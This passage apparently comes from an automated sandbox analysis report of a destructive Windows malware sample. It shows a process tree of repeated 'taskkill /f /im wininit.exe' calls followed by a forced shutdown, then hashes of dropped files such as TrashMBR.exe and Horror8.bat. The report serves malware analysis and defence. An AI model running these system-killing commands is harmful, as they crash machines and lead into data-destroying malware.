                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3440
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3328
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2996
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:4956
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:4456
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2864
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3612
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3392
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3924
                                                                          • C:\Windows\SysWOW64\Shutdown.exe
                                                                            Shutdown /s /t 00
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3944
                                                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                  1⤵
                                                                    PID:4340
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                    1⤵
                                                                      PID:2184
                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                      C:\Windows\system32\AUDIODG.EXE 0x2ec 0x498
                                                                      1⤵
                                                                        PID:4464

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                        Filesize

                                                                        649B

                                                                        MD5

                                                                        aac5f1315a5dff0df6a02dc9dfd69d33

                                                                        SHA1

                                                                        4d9af745f1ba8b2498d7136a65b900712051be84

                                                                        SHA256

                                                                        fd02ffa39686130ec9f55ad5693674a95fbbb2f664c95079e9f30f986742660f

                                                                        SHA512

                                                                        4d9795c12f1844b6b91cf3b9ad9a3b9538f7af06b91406f827f48579e1030a12b5298f35c1eeaa9d2b8e27b6ee775d2332b9028be773b9f61c6627855b4e194f

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002d

                                                                        Filesize

                                                                        215KB

                                                                        MD5

                                                                        e579aca9a74ae76669750d8879e16bf3

                                                                        SHA1

                                                                        0b8f462b46ec2b2dbaa728bea79d611411bae752

                                                                        SHA256

                                                                        6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf

                                                                        SHA512

                                                                        df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        b173ff7b5d91acecceed934a340f777c

                                                                        SHA1

                                                                        6b275af14dd8d0c0a7c63459ca30fe18a4aaa489

                                                                        SHA256

                                                                        175e2220b36199b4799e1b41e7a249d6b94d297ba829eeb07ce5a3453fddbb4d

                                                                        SHA512

                                                                        8801bb4f5e9ae4b9b3046e5de0bc29b5b22140068c67836062a8ce525a29483acf0f7ce9da371af3c0915050dd78451c3ef585785c2c752fd45d8eb59bc93954

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        a5b6379b33565bb845ceee05d012e2a2

                                                                        SHA1

                                                                        f17c883b4eb59df01018681b7d9b3d0b002f5cbe

                                                                        SHA256

                                                                        178aaa0fb14ad3834e9af032ec22399ce92639715339af7aaee4e0f072843559

                                                                        SHA512

                                                                        206b15a2ac8acf545d896675cc4691ae139208252046fdd5ffd16f8ea97d0a95cb5b40be4cc091e0be9e973c8d10ef325671b0e486a86cf8f29226d6a2cddbc6

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                        Filesize

                                                                        18KB

                                                                        MD5

                                                                        cee883c52eaa2c11c60f46b8775f5863

                                                                        SHA1

                                                                        d398165a5e7d13ae84f264e4379a06ddba538e81

                                                                        SHA256

                                                                        0a10eb44e4044c018c39a43ea66ffb26ce404cd7e61466d2ed35c10a811fff53

                                                                        SHA512

                                                                        1c3e0ae33865feca47f38748715ec55099e42d5c1b885e1969df69b854a3fbdd02d6e363127c855488bac4f398facfdb668dcff2272f27e8a242061d25a75566

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                        Filesize

                                                                        2B

                                                                        MD5

                                                                        d751713988987e9331980363e24189ce

                                                                        SHA1

                                                                        97d170e1550eee4afc0af065b78cda302a97674c

                                                                        SHA256

                                                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                        SHA512

                                                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        4KB

                                                                        MD5

                                                                        57222f5cd7c47b8f1142cb629dcbd7db

                                                                        SHA1

                                                                        3798f25d3abd52b1a1502ad87ed2efd6da5ae36b

                                                                        SHA256

                                                                        f2cad746e115910d1784747ae225ef1ad4f1b41fd1d63dbf57fbb6e3dfca7dfc

                                                                        SHA512

                                                                        9ee17e4190d1da078b89929a71c7bfbbb9f79a1564b9e7d5584cf56cec8ecda3fd8db6c080455f069118119a15e0731588511493e05777c61aa745dd9d305dba

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        38c075f7d5e51c326fb53669c797eb04

                                                                        SHA1

                                                                        c7220c16265c6f248e4a31bd65b4bf6bc90fb5c8

                                                                        SHA256

                                                                        049a3cd89be54c93436b1e600cc3cb52b6d105b566ccf6a06cd32f437b9ba191

                                                                        SHA512

                                                                        6c5d2aa91aa49ad03a4eb34909f611c7a569fb5039b161c591fae1ab844ba32e16cdd8f981f4144e0f52c8cbe280579a4500d179b761bf63e47c68ca91838977

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        4KB

                                                                        MD5

                                                                        c98af95f8a50f39df0d0b437078a6175

                                                                        SHA1

                                                                        6d77bb4f08b0e05c2c3fff7793b43c1d39c958f8

                                                                        SHA256

                                                                        d4a4ea763d1c45cca31275cddf04dffe91a7ebd38e560b00d3016e98ecc393ab

                                                                        SHA512

                                                                        a0026644c5e1e303339fd7f3b60c94f5f18f2a25e8aabf7953a06c3701b501232fc3a474465a7a37ef0758e4ea3810f08ada3b4008cf67a07cda604b83e567a2

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        0eea6d152b04add5da3209ab9d2c68be

                                                                        SHA1

                                                                        7ab387cc91c3984a6b09ec132695f84455734f0c

                                                                        SHA256

                                                                        e829f1d9d617d9868122a9a445156014c6e49ed8cd9a17f47806d127508a797b

                                                                        SHA512

                                                                        8ad4205853ab171a172b3aa21eb271bb3fa8dde4ac256ad358f4cdccf8112d4809a148a3843380cf761693b20f5b44773b6fcafff2aab0c38f5307eec425e5b0

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        4KB

                                                                        MD5

                                                                        5c5c05718d17c16541b8736cecdd9e1b

                                                                        SHA1

                                                                        aa7f8607f8b5fcfaf2020167ab1c4802cdb2fa86

                                                                        SHA256

                                                                        fa9468474889451207f325debd6bcf040d9853de95c8a7f28488c8dd8f19fe66

                                                                        SHA512

                                                                        5a3d2ce44d3e3f365ac895b82f2b7636ec3f0df6ad2e55e1e74c15fa38da25c60b9c15b8be777b11a1fd96b0eb1dbdb32ff60485b2d762d65de741bec8e5f4b2

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        0f5cacc113d4b023cbd357eab7006ad8

                                                                        SHA1

                                                                        790d72fd36c52810200db834685b80b2c418a070

                                                                        SHA256

                                                                        00b93d90ff3a5c93d9ba98e9d022d1b262e67903b98ef08efa0bdb120b6ae956

                                                                        SHA512

                                                                        73b389c283f4d2c6bb5460c498af3f373af33a46478a2c8f934429296be134619b30049107f845da05d80f8ad333e5f61c580c3f33fc35ab5b1f40460c0e8509

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        4KB

                                                                        MD5

                                                                        7ad3c5a015f6adf1671ac73533042f85

                                                                        SHA1

                                                                        ee479288a912e967ff4f9c701e561fbbbb2e117a

                                                                        SHA256

                                                                        5505f00608a2ae260e4927f7a4e120d86796b5e19da9b85a6698511e67223a4d

                                                                        SHA512

                                                                        996985086dd5390d88f55d3c60a58b2d48b704232a69827c7a05085032615ff3b0eabded3460c55bb1e4f3aeae73d4ec89dd463013620de7446ed1940dceae61

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        24f38c69943da8faae1ab228755c4b9c

                                                                        SHA1

                                                                        db5884d027e3faba4c7f6d2a2db52beb4fce9f83

                                                                        SHA256

                                                                        1b50635181f031e418562b8e8bcd8a725bda47efdd404ea2db5f95e03e8801e5

                                                                        SHA512

                                                                        4bab5eead53add620bf63fc0292fe1fed27e0d3964dcb6da3df135eb4b04c427accccf6340a51d846b6895dd9c3ea4cdbd2fc6aac4a467a2908056190a9f8f28

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        90cb2f5ccfd7d2da5c73f22064ee9663

                                                                        SHA1

                                                                        f3dda9968cac7ce8f6d122fafbac63f164faf17a

                                                                        SHA256

                                                                        e97b4bcc54a6b27c3a62dac7a7446a04e6f18de257f1b1f3dd6e288d6d75c52b

                                                                        SHA512

                                                                        29cc7182b05acc2bc1ed49affa1cf5c96dac6be5d40e8333b1ad03f22b0d6d792adb0b173425fb66ce1d10f90de1a574e60928f75543d75edeee790d9d877126

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        5dbd89d534fa2f55e5579e69412ed30c

                                                                        SHA1

                                                                        4c407565e1e712a5ac2130c3a56edb0771f82d46

                                                                        SHA256

                                                                        7328eb93c74720433f97c097119fce03fceecd03fb922c74dd79c00b6583a9d2

                                                                        SHA512

                                                                        f8bb771ccf1afa75bd6cfbe541571a4b778eaf61a628090b194040edddf24ef5b1246a94cd4981df4ba0adda29092185d3fcfaa88a607a19f95d7627379c259a

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        aedaff5f1006cadbcd0195879bae3c97

                                                                        SHA1

                                                                        10716b6f811aec104b98a4c34bbcaa574320603f

                                                                        SHA256

                                                                        fde44aa06e5cc23a22d02638c0a512b33d65b8bf597dafc99249f565ddb12ea5

                                                                        SHA512

                                                                        edf71eb4eed7a0a78235777306de8749eb2ce065178e64dfe5ce9fe825050a93315ff02745e44762d1c5c60e5f62cd5309e98da7ab4f5d32549438b49dcd1fdb

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        71008aba0df527f0d6a5e9e9caa32575

                                                                        SHA1

                                                                        ff62a42d311ddd352375cf8af46be7cf657dc291

                                                                        SHA256

                                                                        0b73ca1e4f6d67ae3944cd33953c1d766679b97e2684407a34893386e7cec52d

                                                                        SHA512

                                                                        555a08e863e34ab85bbf759eead09ca4720429aa9c6425eb110d21c5d11bf611f78d9cb3da672a826b9895f68c25b10ae75133fcbc01ceb2584512671504a24a

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        4c4ccceb2c315f6d254c16f399aa3566

                                                                        SHA1

                                                                        f9df35e17cc520f29bf2cf862da46eeb340aae6a

                                                                        SHA256

                                                                        bc5cc122a8467c818f95d309ff7618c0d305f55c8f7ea8771ef7d7097b6cf611

                                                                        SHA512

                                                                        879a1c0962ce7bdd486623ba94f0fefb715f11e652e8f01aa9386fc2ffbbcd67094335c65e53d5ea3c1f0d4b1e45afb7249f18ed65fb8a1dd5cfbec765dc97d5

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        5d8469fee3b297559556d069ea7f146f

                                                                        SHA1

                                                                        7d8fa50d4a17d7ddf6c5994c7f0cfe5a69669920

                                                                        SHA256

                                                                        da08f9848959291f541dcfbad55a412ed7fab677a4ae746d1a383b37eaf80fd1

                                                                        SHA512

                                                                        5dbfb9116d4f6dad0667ce106dcb5e3ec8c17f7d3eb85bd3fc05bb015f5d654c8dc095c170d9c3a3a893e9aa772dc318e42684650c34df4d1cf119ba5d6ec344

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        10KB

                                                                        MD5

                                                                        1627fcd0a4ab529773dd8d0754b7128e

                                                                        SHA1

                                                                        4b8dd152bec3e51dc7d3b692b7e61cc3ece52b80

                                                                        SHA256

                                                                        062644c3c21d3055e908fdb3c8e4e62bd40ec101b8e40352cc1407a60e131baa

                                                                        SHA512

                                                                        19c455e57bb110ca4b9e39bfb79e2085fd604b37a81c55fde46d24eb6e27874ba818061f34c2fe936ec62020a4c233a575f1a467e4505ea2325eca998cd23008

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        342663946e7920a5ed80399392a3c0e2

                                                                        SHA1

                                                                        7af85f9c24d64986d73c9420d0f096bfea252b9a

                                                                        SHA256

                                                                        743601677b36e17924ccc13e0a235d7ed443fc2d94db035ddfb76b7b94ac0098

                                                                        SHA512

                                                                        94db3559701da384a7b4a17d44dc45d421028f640467d6042419e1dffdeaa707f3a2d5fe96f5a47692433099a27e20133a8be0ecae121d00ed5bab3c739ab195

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        60689ce03a9bd9eccafa5cea4c4624ac

                                                                        SHA1

                                                                        8370b6a5290c085b13e01d4cc1b353f976f5f87d

                                                                        SHA256

                                                                        8a4f2b9814e1ef378520756cf57dcfd5e78bdf2773093545745d382fa24b30b9

                                                                        SHA512

                                                                        100439f6c0faf6a9f187f9c800110a83107e115df2fe6a37f577fc1b36a108d38666c15f9d2d06564a5bf5b079d7a53e0ba4cd96190d6c63018ac6a5ddbde36f

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        9KB

                                                                        MD5

                                                                        1e4ef151f753d10fa475be00467d224e

                                                                        SHA1

                                                                        b032ba2b89545a8f94bd0eb77379babc732fe825

                                                                        SHA256

                                                                        eb08cd20deb51fbcd40a2b3d5bf7328ec8752d5047dc6b871b7cc6bc2c853e86

                                                                        SHA512

                                                                        33e85bf7194ab5f328564dd5a9a9bd27704e3e2306d6d6cd35f664a104cc7fc96023589b5ae249a417d2a20a081537a0bdfe3e7335626a9f34b4dddb504237ed

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        8c65551e20d0aa1958104eca2f2965ea

                                                                        SHA1

                                                                        decbf839c199cf0976f1125a080454dd910eee95

                                                                        SHA256

                                                                        7814b95f446a61104c849fd03985f7af46c9f0fa08cc6c81387e8f1f23b4603d

                                                                        SHA512

                                                                        19d13d15878327fb183dd29676eae136e37cc062e8728d95c36745bdb1944b43ada8aea129886aac2b62ff315985694ac1752cb7ac057f8ca00bfcf44a716481

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        c625631fcaafa48965b094f4b48458e7

                                                                        SHA1

                                                                        4c7ff6c0c6ef21ee5e97013eb3a25dd5ee9ae910

                                                                        SHA256

                                                                        942d19461ed6c53cb7e5deffb7e0cd0ecc2af50815a64820227f7dcde1874fb1

                                                                        SHA512

                                                                        79c9631d4f8078d8dbc043150b6b2bd2d2cce7ea58fe06c29f3be07f30f41107e9fe54326409bf78bef74c48c18e43649fdcd2f293d103ea70f50026fc8e3fde

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        0ec1e6b2d0dcf609c6b10512178afe22

                                                                        SHA1

                                                                        b5ccbe975aba939195823f01e79585461c389c62

                                                                        SHA256

                                                                        624a5b2aad80db2930920c50b110791ca2ae10f93e98f20430bf2df91cf1d8bf

                                                                        SHA512

                                                                        5de574f5525031c30a578af78b7867ac8127110c61437336aef6f2a8883848efca20be8037f1b91905ba90591dd56d8425545ef0b2c35b6d30b2afa76e2cd9b9

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        9KB

                                                                        MD5

                                                                        07956dae19cf29c3c1ca0b00b7fe8c0d

                                                                        SHA1

                                                                        03016a39b71f3fa863d74a644a7bf8b93107a263

                                                                        SHA256

                                                                        5693f99061a4345cba193719dce45ee0773ffe227d5c6f0ea02ae7f5c8bbc266

                                                                        SHA512

                                                                        29f813f876553d2c637312ca18056be807331cbcdf6e36f0efb1897fb3eaf25357d729ab123384974d9e75a1f131fce3821358abc2b84c28615fe34e8cec0bf0

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        10KB

                                                                        MD5

                                                                        54dbc2e4ad3a17fe6a1d9c5967013d07

                                                                        SHA1

                                                                        2c15bc1600296840b87b1328083f9b29a79c85cc

                                                                        SHA256

                                                                        0aab5e3dccc76968652619ea6e6893bbe60f8c48b7339cb8fcf9639271fe7286

                                                                        SHA512

                                                                        b8d3c73110e30ec57c4b13cd10332309509595134024adfe455a356b945b867e024d0bbb881b3447d3280d9f7eb83988d837b792d6079fa947b0043db197c2c6

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        10KB

                                                                        MD5

                                                                        9f42181691d139139f41d6b94c329b93

                                                                        SHA1

                                                                        60c927dba42f0b8be81bb3f8b1c2f53b92465b59

                                                                        SHA256

                                                                        673bd276510871e117317dbf4ed3332e4283500a9b6b9dd85a0862cdddf8aabe

                                                                        SHA512

                                                                        a48e69b840789e192f9af7938af6a44aa068af7369e2764ddb263e1b4ebf901feb3c015733a4d142873e7c99ec057bcd55d4154eebd845835ff7749f798d1142

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        5cd6576209129c975e8be21ba02c7d68

                                                                        SHA1

                                                                        b3d58e166688f7c7da2a2b89e5517b3f5adf612f

                                                                        SHA256

                                                                        3e7e5429e7af2de6ea4c0134b6695b36ed2f3c41014ce458f1fb49b7f6598fa9

                                                                        SHA512

                                                                        5831f3e2e33ff32440f8721255d82a767abf289424ad9b45105102b26f5a06448cbc21b1070470a106b98c7d3b3905d96053cac6981d96880c7c6616e8b253b2

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        5ce33f6c7ce3e2cfec067a06b1f40162

                                                                        SHA1

                                                                        7260f65ca4457bc13b37e0b167c5537d30baf5e1

                                                                        SHA256

                                                                        46e81faefa085645c3a887a59c5a1dc2ca83694f3c014124d6e73528c4028a9a

                                                                        SHA512

                                                                        5037f4235922f7ec910aff89f96cc01cd977a86a712b5bd02d2748428bbe94bff8324930f4452b3b7353354405ea0d10568a6f2832a53628500d01eef19327fe

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                        Filesize

                                                                        11KB

                                                                        MD5

                                                                        84353a032b1972b16af3f87b2f140318

                                                                        SHA1

                                                                        c22743eb03c819256a147e8f80966d285051c081

                                                                        SHA256

                                                                        f6a7295102cca922988985f1306d28df2d5ea27e0729712d9b6b0d2fa0663b9a

                                                                        SHA512

                                                                        0919025f46ab538985ba6bd96e4e614b87c2cde256a7b257a6efcf8e07c7dfc94c4926f93f78e5bd4284c62b18bfbca3d8b92eb90b4f7998ef38bb248c1dacca

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                        Filesize

                                                                        116KB

                                                                        MD5

                                                                        def41a182930b455473dfd42aea265cb

                                                                        SHA1

                                                                        1f9e0d034881ac8dfd1d3b066d671323e52f3029

                                                                        SHA256

                                                                        d1a38d39ebc525bd9c54ea41039edec1d403e2fde98fcdf2009ef1ff7d963d61

                                                                        SHA512

                                                                        af29aba257edfac890be7b46fd17049fe32802986ad9ae96e3ae15e37663cf454b8406a8ab94b3a7d6b237022b3bcaf290dd49059424a6caf7d92fc610ec8f3b

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                        Filesize

                                                                        116KB

                                                                        MD5

                                                                        73567f3948f7e05b113999096a96653d

                                                                        SHA1

                                                                        8da5fc879bb249aa09dd48ecb7f52cb886f5d587

                                                                        SHA256

                                                                        3ce6645c00210eee7c04f221b1eb8c10b0705a9d98750cbb8333449538448708

                                                                        SHA512

                                                                        66de2d58cba1ea45e720f4da0befe7647cf236b3d244de427f83e3fa1355bddb3a8cac09d950f5815cf7c0ae6aac2219c515089ad89040b1d319b61a421c1f39

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                        Filesize

                                                                        116KB

                                                                        MD5

                                                                        76a218a2bd4371bfb084e31657ad72fa

                                                                        SHA1

                                                                        01902c2b65c834940001c80b29d959dad0e017e5

                                                                        SHA256

                                                                        a1b9ed928651b48a8e0f5eb6f1bc4e17c618722a899a42b5ecf29ec27d3b41ed

                                                                        SHA512

                                                                        78799f8c03ea17fceee53bfb0fa0caefdac134faa9c75af801db7a6429af94a4c91dac97ad166eaa00a53b7d8564bd190953a8284494bccf9b31e7a76c1f13eb

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
  Filesize: 116KB
  MD5: b355aa56797f07aa400e2fdc10d97a76
  SHA1: b34687ae5a0f46ffbbc35e9b144ea4ad627c0779
  SHA256: 2a8f4e6fe138fa5b15f0a25c2b823ec3ffb5f43903a7d401f260a9164f739ea8
  SHA512: 39ee76e77dca82d0a01c67e2e13a023f2c3ce21fba3be4f8a198b2b9f539724db1ce666a97bdfdd631afade91b2308a2929e1e11a979a7ddee900d201abdaf8a

• C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
  Filesize: 64KB
  MD5: 987a07b978cfe12e4ce45e513ef86619
  SHA1: 22eec9a9b2e83ad33bedc59e3205f86590b7d40c
  SHA256: f1a4a978ce1c4731df1594043135cf58d084fdf129dd1c8e4507c9e06eac5ea8
  SHA512: 39b86540e4d35c84609ef66537b5aa02058e3d4293f902127c7d4eac8ffc65920cb5c69a77552fc085687eed66e38367f83c177046d0ecb8e6d135463cc142aa

• C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
  Filesize: 9KB
  MD5: 7050d5ae8acfbe560fa11073fef8185d
  SHA1: 5bc38e77ff06785fe0aec5a345c4ccd15752560e
  SHA256: cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
  SHA512: a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

• C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\ED60.tmp\ED61.vbs
  Filesize: 710B
  MD5: 3bafc447cf86b66198f84690cb592adb
  SHA1: 5d16e560003b0ca1efa914aa0960fa84dbe1a0a6
  SHA256: b96a442adc718e9e0981b1c3bea2c8172f6c5b2c8c1fecda5c311c95728bafff
  SHA512: f0aaef88ff735c8823cf83bf513a95084ccc617aa97bfed8ee86dc1366ae8cef679a7b5bf48116370493e0074fd7f56ce7e5e9f22bfbd8dd6f2f7c8489419700

• C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\Horror8.bat
  Filesize: 915B
  MD5: 36fcf85ec52716f5fd8ea625a11c13c6
  SHA1: 60a720249c6bb3617e904445c247487dba96af9c
  SHA256: 3aba2d676284209730ff20b28a8415a3c41c88f402301b14437040bf2baebe0c
  SHA512: 1ba72a3ea4cf1014f0072184067611448276fff273f803c829d1f6bbeb6dd24c7dca41eada5b78f2ddc7dabadf5c5a66e11cd4f8a5aea31d261a69ef186d09f6

• C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\HorrorGui.exe
  Filesize: 308KB
  MD5: b2653aa06a2253e8155eb81535b20e6a
  SHA1: 0cf61fc537d8d73c71724febd0f1f34a6fddc838
  SHA256: b4e106e22c4d3e51c87d3d5853298210572ab2834f5e2a0beaf1df7d96c57d29
  SHA512: 143694740660ac46f0c6c78903e8378fd402b5338dfb68c3e4a148f6f83036eaea3be6bda160d59ed1c5b52ba235823e284a0564ab9dbedcc3d3a6e40584fd98

• C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\TrashMBR.exe
  Filesize: 47KB
  MD5: 87f09f4a202bf9c0adcf6fed942aa703
  SHA1: 96bf11ff017e31ec2242c0024c372628c40cbd4f
  SHA256: acf8abe9bd2f61840a247b4796ebedad20f69a85dbdf8a4100f5d7d306b064b1
  SHA512: 85202719aa875b2697ae3082a79a3ca7c1e1be377d6b19f9f159488a5f9d6ec6e9ec35352b067a1bc15546165764acb108c11203bf482ea43684e433717eee58

• C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\clingclang.wav
  Filesize: 13.1MB
  MD5: 1c723b3b9420e04cb8845af8b62a37fa
  SHA1: 3331a0f04c851194405eb9a9ff49c76bfa3d4db0
  SHA256: 6831f471ee3363e981e6a1eb0d722f092b33c9b73c91f9f2a9aafa5cb4c56b29
  SHA512: 41f4005ec2a7e0ee8e0e5f52b9d97f25a64a25bb0f00c85c07c643e4e63ea361b4d86733a0cf719b30ea6af225c4fcaca494f22e8e2f73cda9db906c5a0f12ae

• C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\music.vbs
  Filesize: 227B
  MD5: 8b703f9c48eb3724348af746e7610061
  SHA1: 599aa1820096e92546ea8d863d46cc49404e19e6
  SHA256: e8cd555c43973e3b2e6fa0e80d602abc3d7c43a17bc51a6d0ba08e20ea3feadd
  SHA512: d38e39e3f9ff71f68d3d851b635bcc27939656ec085369652a324d8b0c95042e722a07b0b06a0a25f0f2b51d5ad1addc3174c472bda3f86cbf28376ba4870208

• C:\Users\Admin\Downloads\Unconfirmed 984095.crdownload
  Filesize: 12.4MB
  MD5: 846d847d9b1247c57824d5d2601a7faf
  SHA1: 2119dccee1e98af31fd193cf38bbfd8614f183bb
  SHA256: ba8fa2c240edfc35c3078fcf31b87c0e1af4404dfc1f52e0d5640edb061355fc
  SHA512: 8cbad0562c13f997fd2e90e6f3a998cdbd2c207592c1d85e6bcf5c794a65bbf2322355a33c9d1af4f03519447c397e7b34dfea179c30d1a054d32d6031c723ec

• \??\pipe\crashpad_4728_IPYWWFNRJTQDWSNV (no size reported; the four digests below are those of empty input, so no content was captured from this pipe)
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
